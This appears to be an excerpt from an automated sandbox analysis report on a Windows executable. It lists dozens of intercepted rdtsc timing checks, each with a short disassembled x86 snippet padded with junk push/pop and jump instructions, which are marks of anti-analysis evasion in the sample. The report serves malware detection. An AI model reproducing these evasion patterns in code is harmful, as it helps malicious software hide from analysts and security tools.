                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8F14 second address: FC8F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F4FE9502C6Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9211 second address: FC9217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC960B second address: FC961D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC961D second address: FC964B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 jmp 00007F4FE915D6AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE915D6ABh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9E6D second address: FC9E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9E72 second address: FC9E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4FE915D6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFE49 second address: FCFE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4FE9502C56h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFE53 second address: FCFE83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F4FE915D6B7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFE83 second address: FCFE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFE87 second address: FCFE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FE915D6ADh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCFE9D second address: FCFEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41551 second address: F4155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4FE915D6A8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4155F second address: F4156B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4156B second address: F4156F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4156F second address: F41586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F4FE9502C5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41586 second address: F4159B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F4FE915D6A6h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4159B second address: F4159F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4159F second address: F415A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD29D7 second address: FD29DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5806 second address: FD586A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F4FE915D6ADh 0x0000000c jmp 00007F4FE915D6B8h 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4FE915D6B9h 0x0000001d pop ecx 0x0000001e jmp 00007F4FE915D6B7h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD586A second address: FD5870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5870 second address: FD5876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5876 second address: FD587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F556C2 second address: F556C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F556C7 second address: F556DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F4FE9502C7Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD52C5 second address: FD5305 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE915D6AEh 0x00000008 js 00007F4FE915D6BAh 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F4FE915D6B2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F4FE915D6AEh 0x00000021 popad 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5305 second address: FD530F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA5ED second address: FDA603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA603 second address: FDA624 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA624 second address: FDA62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA772 second address: FDA777 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C523 second address: F8C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F4FE915D6ABh 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F4FE915D6A8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F4FE915D6B1h 0x0000002d or di, E497h 0x00000032 pop edx 0x00000033 call 00007F4FE915D6B3h 0x00000038 mov dword ptr [ebp+122D3730h], edi 0x0000003e pop edi 0x0000003f mov ebx, dword ptr [ebp+124805DCh] 0x00000045 mov edi, esi 0x00000047 mov edi, esi 0x00000049 add eax, ebx 0x0000004b add dword ptr [ebp+122D2C3Bh], ecx 0x00000051 nop 0x00000052 push eax 0x00000053 jmp 00007F4FE915D6AEh 0x00000058 pop eax 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pushad 0x0000005e popad 0x0000005f pop eax 0x00000060 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C5AE second address: F8C5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C68h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C5CA second address: F8C5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB576 second address: FDB57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE12E4 second address: FE12EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE12EA second address: FE12FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C5Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE12FC second address: FE1300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1300 second address: FE1320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE9502C64h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1320 second address: FE1328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE147B second address: FE147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE147F second address: FE1487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4898 second address: FE489C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4CF9 second address: FE4D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4FE915D6A6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4D03 second address: FE4D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4FE9502C63h 0x0000000d jns 00007F4FE9502C56h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4D24 second address: FE4D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4E92 second address: FE4EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4EA0 second address: FE4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jp 00007F4FE915D6AAh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4FE915D6B5h 0x00000017 jmp 00007F4FE915D6ACh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4EDC second address: FE4EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA47 second address: F4EA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA4B second address: F4EA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA2ED second address: FEA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA2F1 second address: FEA2F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA2F6 second address: FEA2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA43C second address: FEA441 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA441 second address: FEA454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4FE915D6A6h 0x0000000d jg 00007F4FE915D6A6h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBAEC second address: FEBAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF07D1 second address: FF07E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF07E8 second address: FF07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4FE9502C56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF07F4 second address: FF07F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF919 second address: FEF92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFA7E second address: FEFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFBD5 second address: FEFBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE9502C67h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFBF2 second address: FEFC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F4FE915D6A6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFC04 second address: FEFC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF48FE second address: FF4923 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FE915D6A6h 0x00000008 jmp 00007F4FE915D6ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F4FE915D6AEh 0x00000015 pop edi 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB5C9 second address: FFB5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBD6D second address: FFBD73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBD73 second address: FFBD9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4FE9502C5Eh 0x00000014 jg 00007F4FE9502C56h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBD9F second address: FFBDBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBDBC second address: FFBDCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F4FE9502C56h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4FE9502C56h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC1F2 second address: FFC1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC1F8 second address: FFC211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C63h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCBC6 second address: FFCBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4FE915D6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E07E second address: 100E085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E085 second address: 100E08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E08B second address: 100E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013443 second address: 101347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B3h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F4FE915D6B2h 0x00000010 jnc 00007F4FE915D6A6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101347D second address: 1013481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013481 second address: 1013485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017BBE second address: 1017BF0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FE9502C69h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jnc 00007F4FE9502C58h 0x00000014 jc 00007F4FE9502C5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10191DB second address: 10191DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10191DF second address: 10191E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101904E second address: 1019054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019054 second address: 101905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50578 second address: F505B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F4FE915D6B4h 0x0000000c push eax 0x0000000d jmp 00007F4FE915D6AFh 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 jo 00007F4FE915D6AEh 0x0000001d jnl 00007F4FE915D6A6h 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F505B9 second address: F505C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F505C1 second address: F505C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F505C7 second address: F505DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F4FE9502C5Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102268B second address: 1022695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022695 second address: 10226A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10226A0 second address: 10226C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6ACh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10226C9 second address: 10226EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C63h 0x00000007 jmp 00007F4FE9502C5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10226EF second address: 10226F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027D8E second address: 1027D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027D92 second address: 1027D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102816B second address: 102817B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
